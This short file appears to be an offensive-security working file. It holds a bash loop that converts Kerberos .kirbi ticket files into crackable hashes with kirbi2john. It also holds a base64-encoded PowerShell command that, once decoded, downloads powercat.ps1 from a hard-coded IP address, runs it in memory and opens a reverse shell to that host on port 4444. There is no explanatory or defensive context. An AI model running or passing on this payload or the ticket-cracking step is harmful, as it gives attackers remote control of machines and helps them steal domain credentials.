#!/bin/bash

for f in $(ls); do
	if [[ $f == *.kirbi ]]; then
		echo $f
		name=$(echo $f| awk -F ".kirbi" '{print $1}')
		kirbi2john $f -o "hash_$name"
	fi
done
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMQA5AC4AMQA1ADkALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAnACkAOwBwAG8AdwBlAHIAcgBjAGEAdAB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADEAMQA5AC4AMQA1ADkAIAAtAHAAIAA0ADQANAA0ACAALQBlAHAACgA=